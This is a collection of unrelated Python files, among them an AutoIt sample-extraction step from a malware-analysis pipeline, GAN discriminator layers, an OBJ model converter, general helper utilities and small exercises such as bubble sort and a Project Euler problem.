resources = extract(data=sample.content, version=AutoItVersion.EA06)
if resources:
self.log.info("Found embedded data, reporting!")
for res_name, res_data in resources:
if res_name.endswith(".dll") or res_name.endswith(".exe"):
task_params = {
"type": "sample",
"kind": "raw",
}
elif res_name == "script.au3":
task_params = {
"type": "sample",
"kind": "script",
"stage": "analyzed",
"extension": "au3",
}
else:
continue
self.log.info("Sending a task with %s", res_name)
script = Resource(res_name, res_data)
self.send_task(
Task(
task_params,
payload={
"sample": script,
"parent": sample,
"tags": ["script:win32:au3"],
},
)
)
if res_name == "script.au3":
self.log.info("Looking for a binary embedded in the script")
drop = extract_binary(res_data.decode())
if drop:
self.log.info("Found an embedded binary")
self.send_task(
Task(
{"type": "sample", "kind": "raw"},
payload={
"sample": Resource(
name="autoit_drop.exe", content=drop
),
"parent": script,
},
)
)
|
"""
Provide constants for hostdb endpoint.
"""
ALL_URL = '/hostdb/all'
ACTIVE_URL = '/hostdb/active'
HOSTS_URL = '/hostdb/hosts/'
|
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.utils.spectral_norm as SpectralNorm
def get_norm(norm_type, size):
if(norm_type == 'batchnorm'):
return nn.BatchNorm2d(size)
elif(norm_type == 'instancenorm'):
return nn.InstanceNorm2d(size)
class Nothing(nn.Module):
def __init__(self):
super(Nothing, self).__init__()
def forward(self, x):
return x
class ConvBlock(nn.Module):
def __init__(self, ni, no, ks, stride, pad = None, pad_type = 'Zero', use_bn = True, use_sn = False, use_pixelshuffle = False, norm_type = 'batchnorm', activation_type = 'leakyrelu'):
super(ConvBlock, self).__init__()
self.use_bn = use_bn
self.use_sn = use_sn
self.use_pixelshuffle = use_pixelshuffle
self.norm_type = norm_type
self.pad_type = pad_type
        if(pad is None):
pad = ks // 2 // stride
if(use_pixelshuffle):
if(self.pad_type == 'Zero'):
self.conv = nn.Conv2d(ni, no * 4, ks, stride, pad, bias = False)
elif(self.pad_type == 'Reflection'):
self.conv = nn.Conv2d(ni, no * 4, ks, stride, 0, bias = False)
self.reflection = nn.ReflectionPad2d(pad)
self.pixelshuffle = nn.PixelShuffle(2)
else:
if(self.pad_type == 'Zero'):
self.conv = nn.Conv2d(ni, no, ks, stride, pad, bias = False)
elif(self.pad_type == 'Reflection'):
self.conv = nn.Conv2d(ni, no, ks, stride, 0, bias = False)
self.reflection = nn.ReflectionPad2d(pad)
if(self.use_bn == True):
if(self.norm_type == 'batchnorm'):
self.bn = nn.BatchNorm2d(no)
elif(self.norm_type == 'instancenorm'):
self.bn = nn.InstanceNorm2d(no)
if(self.use_sn == True):
self.conv = SpectralNorm(self.conv)
if(activation_type == 'relu'):
self.act = nn.ReLU(inplace = True)
elif(activation_type == 'leakyrelu'):
self.act = nn.LeakyReLU(0.2, inplace = True)
elif(activation_type == 'elu'):
self.act = nn.ELU(inplace = True)
elif(activation_type == 'selu'):
self.act = nn.SELU(inplace = True)
        elif(activation_type is None):
self.act = Nothing()
def forward(self, x):
out = x
if(self.pad_type == 'Reflection'):
out = self.reflection(out)
out = self.conv(out)
if(self.use_pixelshuffle == True):
out = self.pixelshuffle(out)
if(self.use_bn == True):
out = self.bn(out)
out = self.act(out)
return out
class DeConvBlock(nn.Module):
def __init__(self, ni, no, ks, stride, pad = None, output_pad = 0, use_bn = True, use_sn = False, norm_type = 'batchnorm', activation_type = 'leakyrelu'):
super(DeConvBlock, self).__init__()
self.use_bn = use_bn
self.use_sn = use_sn
self.norm_type = norm_type
if(pad is None):
pad = ks // 2 // stride
self.deconv = nn.ConvTranspose2d(ni, no, ks, stride, pad, output_padding = output_pad, bias = False)
if(self.use_bn == True):
if(self.norm_type == 'batchnorm'):
self.bn = nn.BatchNorm2d(no)
elif(self.norm_type == 'instancenorm'):
self.bn = nn.InstanceNorm2d(no)
if(self.use_sn == True):
self.deconv = SpectralNorm(self.deconv)
if(activation_type == 'relu'):
self.act = nn.ReLU(inplace = True)
elif(activation_type == 'leakyrelu'):
self.act = nn.LeakyReLU(0.2, inplace = True)
elif(activation_type == 'elu'):
self.act = nn.ELU(inplace = True)
elif(activation_type == 'selu'):
self.act = nn.SELU(inplace = True)
        elif(activation_type is None):
self.act = Nothing()
def forward(self, x):
out = self.deconv(x)
if(self.use_bn == True):
out = self.bn(out)
out = self.act(out)
return out
class PatchGan_D_70x70_One_Input(nn.Module):
def __init__(self, ic, use_sigmoid = True, norm_type = 'instancenorm', use_sn = False):
super(PatchGan_D_70x70_One_Input, self).__init__()
self.ic = ic
self.use_sn = use_sn
self.use_sigmoid = use_sigmoid
self.conv1 = ConvBlock(self.ic, 64, 4, 2, 1, use_bn = False, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv2 = ConvBlock(64, 128, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv3 = ConvBlock(128, 256, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv4 = ConvBlock(256, 512, 4, 1, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv5 = ConvBlock(512, 1, 4, 1, 1, use_bn = False, activation_type = None, use_sn = self.use_sn)
self.sigmoid = nn.Sigmoid()
self.nothing = Nothing()
for m in self.modules():
if(isinstance(m, nn.Conv2d)):
m.weight.data.normal_(0.0, 0.02)
if(m.bias is not None):
m.bias.data.zero_()
def forward(self, x):
out = x
# (bs, ic, 256, 256)
out1 = self.conv1(out)
# (bs, 64, 128, 128)
out2 = self.conv2(out1)
# (bs, 128, 64, 64)
out3 = self.conv3(out2)
# (bs, 256, 32, 32)
out4 = self.conv4(out3)
# (bs, 512, 31, 31)
out5 = self.conv5(out4)
# (bs, 1, 30, 30)
if(self.use_sigmoid == True):
out = self.sigmoid(out5)
else:
out = self.nothing(out5)
return out
class PatchGan_D_286x286_One_Input(nn.Module):
def __init__(self, ic, use_sigmoid = True, norm_type = 'instancenorm', use_sn = False):
super(PatchGan_D_286x286_One_Input, self).__init__()
self.ic = ic
self.use_sn = use_sn
self.use_sigmoid = use_sigmoid
self.conv1 = ConvBlock(self.ic, 64, 4, 2, 1, use_bn = False, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv2 = ConvBlock(64, 128, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv3 = ConvBlock(128, 256, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv4 = ConvBlock(256, 512, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv5 = ConvBlock(512, 512, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv6 = ConvBlock(512, 512, 4, 1, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv7 = ConvBlock(512, 1, 4, 1, 1, use_bn = False, activation_type = None, use_sn = self.use_sn)
self.sigmoid = nn.Sigmoid()
self.nothing = Nothing()
for m in self.modules():
if(isinstance(m, nn.Conv2d)):
m.weight.data.normal_(0.0, 0.02)
if(m.bias is not None):
m.bias.data.zero_()
def forward(self, x):
out = x
# (bs, ic, 256, 256)
out1 = self.conv1(out)
# (bs, 64, 128, 128)
out2 = self.conv2(out1)
# (bs, 128, 64, 64)
out3 = self.conv3(out2)
# (bs, 256, 32, 32)
out4 = self.conv4(out3)
        # (bs, 512, 16, 16)
out5 = self.conv5(out4)
        # (bs, 512, 8, 8)
out6 = self.conv6(out5)
# (bs, 512, 7, 7)
out7 = self.conv7(out6)
# (bs, 1, 6, 6)
if(self.use_sigmoid == True):
out = self.sigmoid(out7)
else:
out = self.nothing(out7)
return out
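# Illustrative usage sketch (assumes a dummy 256x256 RGB batch, matching the shape
# comments in forward above); the 70x70 discriminator then emits a 30x30 patch map.
if __name__ == '__main__':
    net = PatchGan_D_70x70_One_Input(ic = 3, use_sigmoid = True)
    dummy = torch.randn(2, 3, 256, 256)
    out = net(dummy)
    print(out.shape)  # expected: torch.Size([2, 1, 30, 30])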
|
TITLE = "chip-8"
ZOOM = 10
SCREEN_WIDTH = 64
SCREEN_HEIGHT = 32
CLOCK_SPEED = 1200
TIMER_SPEED = 60
BG_COLOR = (0xa0, 0xe6, 0xfa)
FG_COLOR = (0xff, 0xff, 0xff)
|
#!/usr/bin/python3
import sys
n = int(input().strip())
a = list(map(int, input().strip().split(' ')))
def bubble(arr):
count_swap = 0
for num in range(len(arr) - 1, 0, -1):
for i in range(num):
if arr[i] > arr[i + 1]:
arr[i], arr[i + 1] = arr[i + 1], arr[i]
count_swap += 1
return count_swap
if __name__ == "__main__":
print("Array is sorted in {} swaps.".format(bubble(a)))
print("First Element: {}".format(a[0]))
print("Last Element: {}".format(a[-1]))
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from midgard.server.models.base_model_ import Model
from midgard.server import util
class GPUMaxClockInfo(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, sm_clock: float=None, unit: str=None): # noqa: E501
"""GPUMaxClockInfo - a model defined in Swagger
:param sm_clock: The sm_clock of this GPUMaxClockInfo. # noqa: E501
:type sm_clock: float
:param unit: The unit of this GPUMaxClockInfo. # noqa: E501
:type unit: str
"""
self.swagger_types = {
'sm_clock': float,
'unit': str
}
self.attribute_map = {
'sm_clock': 'smClock',
'unit': 'unit'
}
self._sm_clock = sm_clock
self._unit = unit
@classmethod
def from_dict(cls, dikt) -> 'GPUMaxClockInfo':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The GPUMaxClockInfo of this GPUMaxClockInfo. # noqa: E501
:rtype: GPUMaxClockInfo
"""
return util.deserialize_model(dikt, cls)
@property
def sm_clock(self) -> float:
"""Gets the sm_clock of this GPUMaxClockInfo.
:return: The sm_clock of this GPUMaxClockInfo.
:rtype: float
"""
return self._sm_clock
@sm_clock.setter
def sm_clock(self, sm_clock: float):
"""Sets the sm_clock of this GPUMaxClockInfo.
:param sm_clock: The sm_clock of this GPUMaxClockInfo.
:type sm_clock: float
"""
self._sm_clock = sm_clock
@property
def unit(self) -> str:
"""Gets the unit of this GPUMaxClockInfo.
:return: The unit of this GPUMaxClockInfo.
:rtype: str
"""
return self._unit
@unit.setter
def unit(self, unit: str):
"""Sets the unit of this GPUMaxClockInfo.
:param unit: The unit of this GPUMaxClockInfo.
:type unit: str
"""
self._unit = unit
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
DESCRIPTION="""
Converts an OBJ file to the internal model file.
Examples:
1. python3 models.py Warehouse.obj Warehouse.model
2. python3 models.py Warehouse.obj Warehouse.obj --replace-ext
"""
EPILOG = """
Debugging
---------
For the debugging, please, run the script in Spyder twice:
1. First time it will fail.
2. The second time it will run with the default arguments and save the state
between runs, so you'll be able to debug it with comfort.
Created on Sat Jan 26 18:28:01 2019
@author: egslava
"""
######### DEBUG/ARGPARSE ###########
if "N_DEBUG_RUNS" in globals():
if (N_DEBUG_RUNS == 1):
print("Please, don't forget to 'restart_debugging()' if you want to chage the debugging file");
# in_filename = "Cube.obj"
# in_filename = "Plane.obj"
# in_filename = "Warehouse-Triangulated.obj"
in_filename = "Warehouse.obj"
out_filename = "/home/egslava/my/arena-shooter/client/res/warehouse.model"
verbose = False
else:
N_DEBUG_RUNS = 1
import argparse
parser = argparse.ArgumentParser(description=DESCRIPTION,
epilog=EPILOG,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('input', help='input .obj file')
parser.add_argument('output', help='output .model file to create')
parser.add_argument('--replace-ext',
action='store_true',
help='In case if the output file has an extension '
'it will be replaced to ".model automatically')
parser.add_argument('--silent',
action='store_true',
help="Don't print any non-error output")
args = parser.parse_args()
in_filename = args.input
out_filename = args.output
verbose = not args.silent;
if (args.replace_ext):
import os
out_filename = os.path.splitext(out_filename)[0] + ".model"
# 1. Is it
if "data" not in globals():
with open(in_filename, "r") as obj_file:
data = obj_file.read()
##############################################################
########################## CONVERTING ########################
##############################################################
# Here we already have
# - `data` variable with the content of input obj
# - `out_filename` variable with the exact output filename
hash_count = 0
empty_count = 0
v_count = 0
vt_count = 0
vn_count = 0
n_count = 0
f_count = 0
unsupported_count = 0
unknown_count = 0
v_indexes = set()
vt_indexes = set()
vn_indexes = set()
__indexes = set()
positions = []
tex_coords= []
normals = []
unidx_positions = []
unidx_tex_coords = []
unidx_normals = []
unidx_faces = [] # [ [ [1/nil/6], [4//6], [8//6] ], ...]
# face = [
# [[pos, tex, normal], [pos, tex, normal], [pos, tex, normal]]
#]
for line in data.split("\n"):
if line.startswith("#"):
hash_count += 1
elif line.startswith("vt "):
u, v = line[3:].split(" ")
u = float(u)
v = float(v)
tex_coords.append([u, v])
vt_count += 1
elif line.startswith("vn "):
x, y, z = line[3:].split(" ")
x = float(x)
y = float(y)
z = float(z)
# print(x, y, z)
normals.append([x, y, z])
vn_count += 1
elif line.startswith("v "):
x, y, z = line[2:].split(" ")
x = float(x)
y = float(y)
z = float(z)
# print(x, y, z)
positions.append([x, y, z])
v_count += 1
elif line.startswith("f "):
f_count += 1
face = []
verts = line[2:].split(" ")
for vert in verts:
i_v, i_vt, i_vn = vert.split("/")
i_v = int(i_v) - 1
# assert i_v == 0, "i_v == 0"
if (i_vt not in (None, "")):
i_vt = int(i_vt) - 1
else:
i_vt = None
if (i_vn not in (None, "")):
i_vn = int(i_vn) - 1
else:
i_vn = None
# print(i_vt, i_vn)
            assert i_vt is not None or i_vn is not None  # at least one of vt/vn must be present
if (i_v < 0):
raise Exception("Negative indexes are not supported: %d (v)" % i_v)
if (i_vt is not None and i_vt < 0):
raise Exception("Negative indexes are not supported: %d (vt)"% i_vt)
if (i_vn is not None and i_vn < 0):
raise Exception("Negative indexes are not supported: %d (vn)"% i_vn)
v_indexes.add(i_v)
vt_indexes.add(i_vt)
vn_indexes.add(i_vn)
# print("i_v", i_v)
# print("positions: ", positions)
v = positions[i_v]
vt = tex_coords[i_vt] if i_vt is not None else None
vn = normals[i_vn] if i_vn is not None else None
# print(i_vt, i_vn, vt, vn)
assert vt or vn
face.append([v, vt, vn])
assert( len(face) == 3) # currently, only triangles are supported
unidx_faces.append(face)
# __indexes.add(_)
# print(line)
elif not line.strip():
empty_count += 1
# print("Empty line: ", line)
# materials are hardcoded
# smoothing groups
# object groups
elif (line.startswith("mtllib ") or
line.startswith("usemtl ") or
line.startswith("s ") or
line.startswith("o ")):
unsupported_count += 1
else:
unknown_count += 1
# print("Special line: ", line)
def print_debug_info():
print("#: %4d | v: %4d | vt: %3d | vn: %3d | f: %4d | e: %4d" % (
hash_count, v_count, vt_count, vn_count, f_count, empty_count))
print("%3d v_indices" % len(v_indexes))
print("%3d vt_indices" % len(vt_indexes))
print("%3d vn_indices" % len(vn_indexes))
print("%3d __indices" % len(__indexes))
print("Unsupported lines found: %3d" % unsupported_count)
print("Unknown lines found: %3d" % unknown_count)
# print(line)
assert (len(v_indexes) == v_count)
assert (len(vt_indexes.difference({None})) == vt_count)
assert (len(vn_indexes.difference({None})) == vn_count)
VBO_positions = []
VBO_tex_coords = []
VBO_normals = []
for face in unidx_faces:
for vertex in face:
pos, tex, normal = vertex
VBO_positions.append(pos)
VBO_tex_coords.append(tex)
VBO_normals.append(normal)
assert (len(VBO_positions) == len(VBO_tex_coords) == len(VBO_normals))
FLAGS = 0
HAS_POS = 1 << 0
HAS_TEX_COORDS = 1 << 1
HAS_NORMALS = 1 << 2
if None not in VBO_positions:
FLAGS |= HAS_POS
if None not in VBO_tex_coords:
FLAGS |= HAS_TEX_COORDS
if None not in VBO_normals:
FLAGS |= HAS_NORMALS
import struct
with open(out_filename, 'wb') as fout:
n_triangles = len(VBO_positions) // 3
fout.write( struct.pack("I", FLAGS)) # unsigned int - triangle count
fout.write( struct.pack("I", n_triangles)) # unsigned int - triangle count
if FLAGS & HAS_POS:
for position in VBO_positions:
fout.write( struct.pack("fff", *position))
if FLAGS & HAS_TEX_COORDS:
for tex_coords in VBO_tex_coords:
fout.write( struct.pack("ff", *tex_coords))
if FLAGS & HAS_NORMALS:
for normal in VBO_normals:
fout.write( struct.pack("fff", *normal))
if verbose:
print("Transformed {input} to {output}".format(input=in_filename, output=out_filename))
#Here we go. Now we have unidx_faces and we just need to export it! :)
# Yai!
def restart_debugging():
global data
global N_DEBUG_RUNS
del data
del N_DEBUG_RUNS
print("Restarted!")
N_DEBUG_RUNS += 1
|
# -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
import shutil
import random
import string
import re
import json
import socket
"""
Time Helper
"""
def today(form='%Y-%m-%d'):
return datetime.datetime.now().strftime(form)
def days_ago(days=0, form='%Y-%m-%d'):
return (datetime.datetime.now() - datetime.timedelta(days=days)).strftime(form)
def days_later(days=0, form='%Y-%m-%d'):
return (datetime.datetime.now() + datetime.timedelta(days=days)).strftime(form)
def now(form='%Y-%m-%d %H:%M:%S'):
return datetime.datetime.now().strftime(form)
def now_ms(form='%Y-%m-%d %H:%M:%S'): # e.g. 2016-01-01 01:01:01.012
_now = datetime.datetime.now()
return _now.strftime(form) + '.' + "%03d" % round(float(_now.microsecond) / 1000)
def now_timestamp(): # e.g. 1451581261
return int(round(time.time()))
def now_timestamp_ms(): # e.g. 1451581261339
_now = datetime.datetime.now()
return int(time.mktime(
time.strptime(_now.strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S'))) * 1000 + _now.microsecond / 1000
def hours_ago(hours=0, form='%Y-%m-%d %H:%M:%S'):
return (datetime.datetime.now() - datetime.timedelta(hours=hours)).strftime(form)
def hours_later(hours=0, form='%Y-%m-%d %H:%M:%S'):
return (datetime.datetime.now() + datetime.timedelta(hours=hours)).strftime(form)
"""
File Helper
"""
def get_project_path():
_r = re.compile(r"(^.+[/\\])(.*)")
_p = os.path.abspath(__file__)
if os.path.exists("{}/.iparrot".format(_p)):
return _p
while re.search(_r, _p):
_p = re.findall(_r, _p)[0][0]
if os.path.exists("{}/.iparrot".format(_p)):
return _p
else:
_p = os.path.abspath(_p)
return os.path.abspath(__file__)
def get_file_name(file, ext=0):
file = str(file).split('/')[-1].split('\\')[-1]
return file if ext else file.replace(".{}".format(file.split('.')[-1]), '')
def get_file_path(file):
return os.path.dirname(file)
def make_dir(directory):
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
return False
return directory
def remove_dir(directory):
if os.path.exists(directory):
try:
if os.path.isfile(directory):
os.remove(directory)
elif os.path.isdir(directory):
shutil.rmtree(directory)
except OSError:
return False
return directory
def remove_file(filename):
if os.path.exists(filename):
try:
if os.path.isfile(filename):
os.remove(filename)
elif os.path.isdir(filename):
shutil.rmtree(filename)
except OSError:
return False
return filename
def copy_file(source, target):
try:
if os.path.isdir(source):
shutil.copytree(source, target)
else:
shutil.copy(source, target)
except OSError:
return False
return target
def get_dir_folders(directory):
if os.path.isdir(directory):
return [name for name in os.listdir(directory) if os.path.isdir(os.path.join(directory, name))]
else:
return []
def get_dir_files(directory):
if os.path.isdir(directory):
return ["{}/{}".format(directory, name) for name in os.listdir(directory) if os.path.isfile(os.path.join(directory, name))]
else:
return []
"""
Random Helper
"""
def get_random_integer(length=10, head=None, tail=None):
"""
:param length: an integer
:param head: to be started with
:param tail: to be ended with
:return: a random integer
"""
my_str = random.randint(10 ** (length-1), 10 ** length - 1)
if head:
head = str(head)
if len(head) >= length:
return head
my_str = int(head + str(str(my_str)[len(head):]))
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = int(str(str(my_str)[:-len(tail)]) + tail)
return my_str
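# Illustrative usage only (results are random; the numbers shown are made-up examples):
#   get_random_integer(6)           -> e.g. 482913
#   get_random_integer(6, head=13)  -> e.g. 139275 (starts with "13")
#   get_random_integer(6, tail=99)  -> e.g. 574299 (ends with "99")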
def get_random_string(length=10, simple=1, head=None, tail=None):
"""
:param length: an integer
:param simple:
:param head: to be started with
:param tail: to be ended with
:return: a random string
"""
if simple == 1: # base: digits and letters
src = str(string.digits) + string.ascii_letters
elif simple == 2: # on base, remove confusing letters: 0&O&o c&C I&l&1 k&K p&P s&S v&V w&W x&X z&Z
src = 'abdefghijmnqrtuyABDEFGHJLMNQRTUY23456789'
else: # on base, add some special letters
src = str(string.digits) + string.ascii_letters + '~!@#$%^&*,.-_=+'
# in case the length is too high
src = src * int((length / len(src) + 1))
my_str = ''.join(random.sample(src, length))
if head:
head = str(head)
if len(head) >= length:
return head
my_str = head + str(my_str[len(head):])
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = str(my_str[:-len(tail)]) + tail
return str(my_str)
def get_random_phone(head=None, tail=None):
"""
:param head: to be started with
:param tail: to be ended with
:return: a random phone number in China
"""
length = 11
my_str = '1' + "".join(random.choice('3456789')) + "".join(random.choice(string.digits) for i in range(length-2))
if head:
head = str(head)
if len(head) >= length:
return head
my_str = head + str(my_str[len(head):])
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = str(my_str[:-len(tail)]) + tail
return my_str
"""
Dict Helper
"""
# Traverse the dictionary/list to get all key/value pairs with depth of 1
def get_all_kv_pairs(item, prefix=None, mode=1):
"""
:param item: a dict or list, with any depth
:param prefix: prefix of a key, used when recursive
:param mode: 1: depth == 1, 0: extract keys of all levels
:return: all key/value pairs with depth of 1
"""
_pairs = {}
if not mode and prefix:
_pairs[prefix] = item
if not item and prefix:
_pairs[prefix] = item
if isinstance(item, dict): # A.B
for _key, _val in item.items():
_key = "{}.{}".format(prefix, _key) if prefix else _key
if not mode:
_pairs[_key] = _val
_pairs.update(get_all_kv_pairs(item=_val, prefix=_key, mode=mode))
elif isinstance(item, (list, set, tuple)): # A[0]
for i, _key in enumerate(item):
_key = "{}[{}]".format(prefix, i) if prefix else "[{}]".format(i)
if not mode:
_pairs[_key] = item[i]
_pairs.update(get_all_kv_pairs(item=item[i], prefix=_key, mode=mode))
else: # the end level
if prefix:
_pairs[prefix] = item
else:
_pairs[item] = ''
return _pairs
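# Illustrative usage only (hypothetical values): with the default mode=1 only the
# deepest key/value pairs are returned; with mode=0 intermediate levels are kept too.
#   get_all_kv_pairs({'a': {'b': 1}, 'c': [2, 3]})
#     -> {'a.b': 1, 'c[0]': 2, 'c[1]': 3}
#   get_all_kv_pairs({'a': {'b': 1}}, mode=0)
#     -> {'a': {'b': 1}, 'a.b': 1}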
def get_matched_keys(key, keys, fuzzy=1):
"""
:param key: a node or a list of nodes, which would be matched with
:param keys: a list of nodes, which would be matched
:param fuzzy: 1-fuzzy match, 0-exact match
:return: a list of matched keys
"""
descendant_keys = []
if not isinstance(key, (list, set, tuple)):
key = [str(key), ]
if not isinstance(keys, (list, set, tuple)):
keys = [str(keys), ]
if not key:
return keys
for i_key in key:
for j_key in keys:
if fuzzy:
if i_key in j_key:
descendant_keys.append(j_key)
else:
if i_key == j_key:
descendant_keys.append(j_key)
elif j_key.startswith("{}.".format(i_key)):
descendant_keys.append(j_key)
elif j_key.startswith("{}[".format(i_key)):
descendant_keys.append(j_key)
return descendant_keys
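# Illustrative usage only (hypothetical keys):
#   keys = ['data.msgCode', 'data.msgInfo', 'status']
#   get_matched_keys('msg', keys, fuzzy=1)     -> ['data.msgCode', 'data.msgInfo']
#   get_matched_keys('data', keys, fuzzy=0)    -> ['data.msgCode', 'data.msgInfo']
#   get_matched_keys('status', keys, fuzzy=0)  -> ['status']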
# parameters to dict, e.g. date=0305&tag=abcd&id=123 => {'date': '0305', 'tag': 'abcd', 'id': 123}
def param2dict(item):
my_dict = {}
for i_item in str(item).split('&'):
i_arr = i_item.split('=')
my_dict[i_arr[0]] = i_arr[1]
return my_dict
# dict to parameters, e.g. {'date': '0305', 'tag': 'abcd', 'id': 123} => date=0305&tag=abcd&id=123
def dict2param(item):
if not isinstance(item, dict):
return str(item)
my_param = ''
for key, val in item.items():
my_param = my_param + "&{}={}".format(key, val) if my_param else "{}={}".format(key, val)
return my_param
def get_host_ip():
    # create the socket before the try block so that s is always defined in finally
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        ip = s.getsockname()[0]
    finally:
        s.close()
    return ip
if __name__ == "__main__":
    # har_time2timestamp(har_time='aaaa')  # har_time2timestamp is not defined in this module
print(get_project_path())
resp = {
"status.code": 200,
"content": {
"error": "",
"status": 200,
"usedtime": 0,
"srvtime": "2019-8-22 16:48:35",
"islogin": 0,
"iswork": True,
"tag": "3301c39cc5fc4448a3a325c231cfa475",
"data": {
"msgCode": "1000",
"msgInfo": "登录成功",
"data": "",
"RequestId": "e1e527d2-2a02-476c-954c-cf1bf0e61159",
"firstloginCoupon": "",
"MobileStatus": "1",
"MobileNo": "",
"LoginType": 1
}
},
"headers": {
"Date": "Thu, 22 Aug 2019 08:48:34 GMT",
"Content-Type": "application/json; charset=utf-8",
"Content-Length": "323",
"Connection": "keep-alive",
"Server": "openresty/1.11.2.1",
"Cache-Control": "private",
"X-AspNetMvc-Version": "4.0",
"Access-Control-Allow-Origin": "",
"X-AspNet-Version": "4.0.30319",
"X-Powered-By": "ASP.NET",
"id": "TCWEBV088154",
"Leonid-Ins": "735365034-HitConf-2[m]-59e85433a1a367bed390c711",
"p3p": "CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"",
"Leonid-addr": "NTguMjExLjExMS4xOA==",
"Leonid-Time": "0"
},
"cookies": {}
}
print(json.dumps(get_all_kv_pairs(item=resp, mode=0)))
|
# coding=utf-8
'''
Problem 52
12 September 2003
It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.
'''
import euler
for i in range(1, 10**6):
valid = True
for j in range(2, 7):
if not euler.is_permutation(i, i*j):
valid = False
break
if (valid):
        print(i)
break
|
""" To Read pickle files from Corpus """
import nltk
import pickle
from nltk.corpus.reader.api import CorpusReader
from nltk.corpus.reader.api import CategorizedCorpusReader
doc_pattern = r'(?!\.)[a-z_\s]+/[a-f0-9]+\.json'
pkl_pattern = r'(?!\.)[a-z_\s]+/[a-f0-9]+\.pickle'
cat_pattern = r'([a-z_\s]+)/.*'
class PickledCorpusReader(CategorizedCorpusReader,CorpusReader):
def __init__(self, root, fileids=pkl_pattern, **kwargs):
"""
Initialize the corpus reader. Categorized arguments
('cat_pattern', 'cat_map', and 'cat_file') are passed
to the 'CategorizedCorpusReader' constructor. The remaining
arguments are passed to the CorpusReader constructor.
"""
# Add the default category pattern if not passed into the class
if not any (key.startswith('cat_') for key in kwargs.keys()):
kwargs['cat_pattern'] = cat_pattern
# Initialize NLP Corpus reader objects
CategorizedCorpusReader.__init__(self, kwargs)
CorpusReader.__init__(self, root, fileids)
def resolve(self, fileids, categories):
"""
Returns a list of fileids or categories depending on what is passed
to each internal corpus reader function.
"""
if fileids is not None and categories is not None:
raise ValueError ("Specify fileids or categories, not both")
if categories is not None:
return self.fileids(categories)
return fileids
def docs(self, fileids=None, categories=None):
"""
Returns the document from a pickled object for each file in corpus.
"""
#List the fileids & categories
fileids = self.resolve(fileids, categories)
# Load one document into memory at a time
for path, enc, fileid in self.abspaths(fileids, True, True):
with open(path,'rb') as f:
yield pickle.load(f)
def paragraphs(self, fileids=None, categories=None):
"""
        Returns a generator where each paragraph contains a list of sentences.
"""
for doc in self.docs(fileids, categories):
for paragraph in doc:
yield paragraph
def sentences(self, fileids=None, categories=None):
"""
Returns a generator where each sentence contains a list of tokens
"""
for paragraph in self.paragraphs(fileids, categories):
for sent in paragraph:
yield sent
def tokens(self, fileids=None, categories=None):
"""
Returns a list of tokens.
"""
for sent in self.sentences(fileids,categories):
for token in sent:
yield token
def words(self, fileids=None, categories=None):
"""
        Returns a generator of words (the first element of each (token, tag) tuple).
"""
for token in self.tokens(fileids, categories):
yield token[0]
if __name__ == '__main__':
from collections import Counter
corpus = PickledCorpusReader('../corpus')
words = Counter(corpus.words())
print("{:,} vocabulary {:,} word count".format(len(words.keys()),sum(words.values())))
|
import cv2
import numpy as np
from keras.optimizers import SGD
import keras.backend as K
import keras
import pylab as plt
from keras.datasets import cifar10
from densenet121 import DenseNet
# Data loading and preprocessing
(x_train,y_train),(x_test,y_test)=cifar10.load_data()
y_test=keras.utils.to_categorical(y_test,10)
# The model has already been trained; load the trained weights into it
weights_path = 'imagenet_models/densenet121_weights_tf_cifar10.h5'
model = DenseNet(reduction=0.5, classes=10, weights_path=weights_path)
sgd = SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
# Score the model: evaluate() computes the model's error on the input data batch by batch,
# score=model.evaluate(x_test,y_test,batch_size=64)
# print(score)
# 用一张图片测试模型
# im = cv2.resize(cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/cat32.jpg'), (32, 32)).astype(np.float32)
# im=cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/cat32.jpg')
im=cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/airplane.jpg')
plt.imshow(im[...,-1::-1])
# OpenCV reads images in BGR order while imshow expects RGB, so the channels are reversed first
plt.show()
# Insert a new dimension for the batch_size
im = np.expand_dims(im, axis=0)
out = model.predict(im)
print(out)
classes = []
with open('resources/cifar10_classes.txt', 'r') as list_:
for line in list_:
classes.append(line.rstrip('\n'))
print(classes)
print('Prediction: '+str(classes[np.argmax(out)]))
|